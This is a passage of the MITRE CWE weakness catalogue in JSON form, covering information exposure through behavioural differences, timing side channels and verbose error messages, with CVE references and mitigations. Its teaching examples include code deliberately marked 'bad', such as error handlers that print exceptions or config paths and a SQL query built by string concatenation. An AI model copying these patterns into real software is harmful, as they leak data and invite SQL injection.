not).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2025"},{"Reference":"CVE-2001-1497","Description":"Behavioral infoleak in GUI allows attackers to distinguish between alphanumeric and non-alphanumeric characters in a password, thus reducing the search space.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1497"},{"Reference":"CVE-2003-0190","Description":"Product immediately sends an error message when user does not exist instead of waiting until the password is provided, allowing username enumeration.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0190"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Internal behavioral inconsistency infoleak"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Potential_Mitigations, Relationships"}],"Previous_Entry_Name":[{"#text":"Internal Behavioral Inconsistency Information Leak","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure of Internal State Through Behavioral Inconsistency","attr":{"@_Date":"2020-02-24"}}]}},"207":{"attr":{"@_ID":"207","@_Name":"Observable Behavioral Discrepancy With Equivalent Products","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product operates in an environment in which its existence or specific identity should not be known, but it behaves differently than other products with equivalent functionality, in a way that is observable to an attacker.","Extended_Description":"For many kinds of products, multiple products may be available that perform the same functionality, such as a web server, network interface, or intrusion detection system. Attackers often perform \\"fingerprinting,\\" which uses discrepancies in order to identify which specific product is in use. Once the specific product has been identified, the attacks can be made more customized and efficient. Often, an organization might intentionally allow the specific product to be identifiable. However, in some environments, the ability to identify a distinct product is unacceptable, and it is expected that every product would behave in exactly the same way. In these more restricted environments, a behavioral difference might pose an unacceptable risk if it makes it easier to identify the product\'s vendor, model, configuration, version, etc.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"205","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0208","Description":"Product modifies TCP/IP stack and ICMP error messages in unusual ways that show the product is in use.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0208"},{"Reference":"CVE-2004-2252","Description":"Behavioral infoleak by responding to SYN-FIN packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2252"},{"Reference":"CVE-2000-1142","Description":"Honeypot generates an error with a \\"pwd\\" command in a particular directory, allowing attacker to know they are in a honeypot system.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1142"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"External behavioral inconsistency infoleak"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":[{"#text":"External Behavioral Inconsistency Information Leak","attr":{"@_Date":"2009-12-28"}},{"#text":"Information Exposure Through an External Behavioral Inconsistency","attr":{"@_Date":"2020-02-24"}}]}},"208":{"attr":{"@_ID":"208","@_Name":"Observable Timing Discrepancy","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Two separate operations in a product require different amounts of time to complete, in a way that is observable to an actor and reveals security-relevant information about the state of the product, such as whether a particular operation was successful or not.","Extended_Description":"In security-relevant contexts, even small variations in timing can be exploited by attackers to indirectly infer certain details about the product\'s internal operations. For example, in some cryptographic algorithms, attackers can use timing differences to infer certain properties about a private key, making the key easier to guess. Timing discrepancies effectively form a timing side channel.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"203","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"385","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"327","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0078","Description":"SSL implementation does not perform a MAC computation if an incorrect block cipher padding is used, which causes an information leak (timing discrepancy) that may make it easier to launch cryptographic attacks that rely on distinguishing between padding and MAC verification errors, possibly leading to extraction of the original plaintext, aka the \\"Vaudenay timing attack.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0078"},{"Reference":"CVE-2000-1117","Description":"Virtual machine allows malicious web site operators to determine the existence of files on the client by measuring delays in the execution of the getSystemResource method.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1117"},{"Reference":"CVE-2003-0637","Description":"Product uses a shorter timeout for a non-existent user than a valid user, which makes it easier for remote attackers to guess usernames and conduct brute force password guessing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0637"},{"Reference":"CVE-2003-0190","Description":"Product immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0190"},{"Reference":"CVE-2004-1602","Description":"FTP server responds in a different amount of time when a given username exists, which allows remote attackers to identify valid usernames by timing the server response.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1602"},{"Reference":"CVE-2005-0918","Description":"Browser allows remote attackers to determine the existence of arbitrary files by setting the src property to the target filename and using Javascript to determine if the web page immediately stops loading, which indicates whether the file exists or not.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0918"}]},"Functional_Areas":{"Functional_Area":["Cryptography","Authentication"]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Timing discrepancy infoleak"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"462"}}},"Notes":{"Note":{"#text":"Often primary in cryptographic applications and algorithms.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Timing Discrepancy Information Leak","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Timing Discrepancy","attr":{"@_Date":"2020-02-24"}}]}},"209":{"attr":{"@_ID":"209","@_Name":"Generation of Error Message Containing Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software generates an error message that includes sensitive information about its environment, users, or associated data.","Extended_Description":{"xhtml:p":["The sensitive information may be valuable information on its own (such as a password), or it may be useful for launching other, more serious attacks. The error message may be created in different ways:","An attacker may use the contents of error messages to help launch another, more focused attack. For example, an attempt to exploit a path traversal weakness (CWE-22) might yield the full pathname of the installed application. In turn, this could be used to select the proper number of \\"..\\" sequences to navigate to the targeted file. An attack using SQL injection (CWE-89) might not initially succeed, but an error message could reveal the malformed query, which would expose query logic and possibly even passwords or other sensitive information used within the query."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["self-generated: the source code explicitly constructs the error message and delivers it","externally-generated: the external environment, such as a language interpreter, handles the error and constructs its own message, whose contents are not under direct control by the programmer"]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Often"}},{"attr":{"@_Name":"Java","@_Prevalence":"Often"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"System Configuration"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Often this will either reveal sensitive information which may be used for a later attack or private information stored in the server."}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"This weakness generally requires domain-specific interpretation using manual analysis. However, the number of potential error conditions may be too large to cover completely within limited time constraints.","Effectiveness":"High"},{"Method":"Automated Analysis","Description":"Automated methods may be able to detect certain idioms automatically, such as exposed stack traces or pathnames, but violation of business rules or privacy requirements is not typically feasible.","Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":{"xhtml:p":["This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Error conditions may be triggered with a stress-test by calling the software simultaneously from a large number of threads or processes, and look for evidence of any unexpected behavior."]},"Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-12"},"Method":"Manual Dynamic Analysis","Description":"Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application\'s environment, it may still indicate unexpected conditions that were not handled by the application itself."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-39"},"Phase":"Implementation","Description":{"xhtml:p":["Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.","If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.","Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not."]}},{"Phase":"Implementation","Description":"Handle exceptions internally and do not display errors containing potentially sensitive information to a user."},{"attr":{"@_Mitigation_ID":"MIT-33"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"Use naming conventions and strong types to make it easier to spot when sensitive data is being used. When creating structures, objects, or other complex entities, separate the sensitive and non-sensitive data as much as possible.","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This makes it easier to spot places in the code where data is being used that is unencrypted."},{"attr":{"@_Mitigation_ID":"MIT-40"},"Phase":["Implementation","Build and Compilation"],"Strategy":"Compilation or Build Hardening","Description":"Debugging information should not make its way into a production release."},{"attr":{"@_Mitigation_ID":"MIT-40"},"Phase":["Implementation","Build and Compilation"],"Strategy":"Environment Hardening","Description":"Debugging information should not make its way into a production release."},{"Phase":"System Configuration","Description":"Where available, configure the environment to use less verbose error messages. For example, in PHP, disable the display_errors setting during configuration, or at runtime using the error_reporting() function."},{"Phase":"System Configuration","Description":"Create default error pages or messages that do not leak any information."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following example, sensitive information might be printed depending on the exception that occurs.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (Exception e) {}","xhtml:div":[{"#text":"/.../","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.out.println(e);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}},"Body_Text":"If an exception related to SQL is handled by the catch, then the output might contain sensitive information such as SQL query structure or private information. If this output is redirected to a web user, this may represent a security problem."},{"attr":{"@_Demonstrative_Example_ID":"DX-118"},"Intro_Text":"This code tries to open a database connection, and prints any exceptions that occur.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (Exception $e) {}","xhtml:div":[{"#text":"openDbConnection();","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo \'Caught exception: \', $e->getMessage(), \'\\\\n\';echo \'Check credentials in config file at: \', $Mysql_config_location, \'\\\\n\';","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""],"xhtml:i":"//print exception message that includes exception message and configuration file location"}},"Body_Text":"If an exception occurs, the printed message exposes the location of the configuration file the script is using. An attacker can use this information to target the configuration file (perhaps exploiting a Path Traversal weakness). If the file can be read, the attacker could gain credentials for accessing the database. The attacker may also be able to replace the file with a malicious one, causing the application to use an arbitrary database."},{"Intro_Text":"The following code generates an error message that leaks the full pathname of the configuration file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$ConfigDir = \\"/home/myprog/config\\";$uname = GetUserInput(\\"username\\");ExitError(\\"Bad hacker!\\") if ($uname !~ /^\\\\w+$/);$file = \\"$ConfigDir/$uname.txt\\";if (! (-e $file)) {}...","xhtml:br":["","","","","","",""],"xhtml:i":"# avoid CWE-22, CWE-78, others.","xhtml:div":{"#text":"ExitError(\\"Error: $file does not exist\\");","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"If this code is running on a server, such as a web application, then the person making the request should not know what the full pathname of the configuration directory is. By submitting a username that does not produce a $file that exists, an attacker could get this pathname. It could then be used to exploit path traversal or symbolic link following problems that may exist elsewhere in the application."},{"attr":{"@_Demonstrative_Example_ID":"DX-119"},"Intro_Text":"In the example below, the method getUserBankAccount retrieves a bank account object from a database using the supplied username and account number to query the database. If an SQLException is raised when querying the database, an error message is created and output to a log file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public BankAccount getUserBankAccount(String username, String accountNumber) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BankAccount userAccount = null;String query = null;try {} catch (SQLException ex) {}return userAccount;","xhtml:br":["","",""],"xhtml:div":[{"#text":"if (isAuthorizedUser(username)) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"query = \\"SELECT * FROM accounts WHERE owner = \\"+ username + \\" AND accountID = \\" + accountNumber;DatabaseManager dbManager = new DatabaseManager();Connection conn = dbManager.getConnection();Statement stmt = conn.createStatement();ResultSet queryResult = stmt.executeQuery(query);userAccount = (BankAccount)queryResult.getObject(accountNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]}},{"#text":"String logMessage = \\"Unable to retrieve account information from database,\\\\nquery: \\" + query;Logger.getLogger(BankManager.class.getName()).log(Level.SEVERE, logMessage, ex);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"The error message that is created includes information about the database query that may contain sensitive information about the database or query logic. In this case, the error message will expose the table name and column names used in the database. This data could be used to simplify other attacks, such as SQL injection (CWE-89) to directly access the database."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-2049","Description":"POP3 server reveals a password in an error message after multiple APOP commands are sent. Might be resultant from another weakness.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2049"},{"Reference":"CVE-2007-5172","Description":"Program reveals password in error message if attacker can trigger certain database errors.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5172"},{"Reference":"CVE-2008-4638","Description":"Composite: application running with high privileges (CWE-250) allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file (CWE-209).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4638"},{"Reference":"CVE-2008-1579","Description":"Existence of user names can be determined by requesting a nonexistent blog and reading the error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1579"},{"Reference":"CVE-2007-1409","Description":"Direct request to library file in web application triggers pathname leak in error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1409"},{"Reference":"CVE-2008-3060","Description":"Malformed input to login page causes leak of full path when IMAP call fails.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3060"},{"Reference":"CVE-2005-0603","Description":"Malformed regexp syntax leads to information exposure in error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0603"},{"Reference":"CVE-2017-9615","Description":"verbose logging stores admin credentials in a world-readablelog file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9615"},{"Reference":"CVE-2018-1999036","Description":"SSH password for private key stored in build log","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1999036"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Accidental leaking of sensitive information through error messages"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A6","Entry_Name":"Information Leakage and Improper Error Handling","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A7","Entry_Name":"Improper Error Handling","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR01-J","Entry_Name":"Do not allow exceptions to expose sensitive information"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"215"}},{"attr":{"@_CAPEC_ID":"463"}},{"attr":{"@_CAPEC_ID":"54"}},{"attr":{"@_CAPEC_ID":"7"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-174"}},{"attr":{"@_External_Reference_ID":"REF-175","@_Section":"Section 9.2, Page 326"}},{"attr":{"@_External_Reference_ID":"REF-176","@_Section":"Chapter 16, "General Good Practices." Page 415"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 11: Failure to Handle Errors Correctly." Page 183"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 12: Information Leakage." Page 191"}},{"attr":{"@_External_Reference_ID":"REF-179"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, "Overly Verbose Error Messages", Page 75"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Name, Potential_Mitigations, References, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References"},{"Modification_Organization":"Veracode","Modification_Date":"2010-09-09","Modification_Comment":"Suggested OWASP Top Ten mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Name, Observed_Examples, References, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Error Message Information Leaks","attr":{"@_Date":"2009-01-12"}},{"#text":"Error Message Information Leak","attr":{"@_Date":"2009-12-28"}},{"#text":"Information Exposure Through an Error Message","attr":{"@_Date":"2020-02-24"}}]}},"210":{"attr":{"@_ID":"210","@_Name":"Self-generated Error Message Containing Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software identifies an error condition and creates its own diagnostic or error messages that contain sensitive information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"209","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-40"},"Phase":["Implementation","Build and Compilation"],"Strategy":"Compilation or Build Hardening","Description":"Debugging information should not make its way into a production release."},{"attr":{"@_Mitigation_ID":"MIT-40"},"Phase":["Implementation","Build and Compilation"],"Strategy":"Environment Hardening","Description":"Debugging information should not make its way into a production release."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code uses custom configuration files for each user in the application. It checks to see if the file exists on the system before attempting to open and use the file. If the configuration file does not exist, then an error is generated, and the application exits.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$uname = GetUserInput(\\"username\\");if ($uname !~ /^\\\\w+$/){}$filename = \\"/home/myprog/config/\\" . $uname . \\".txt\\";if (!(-e 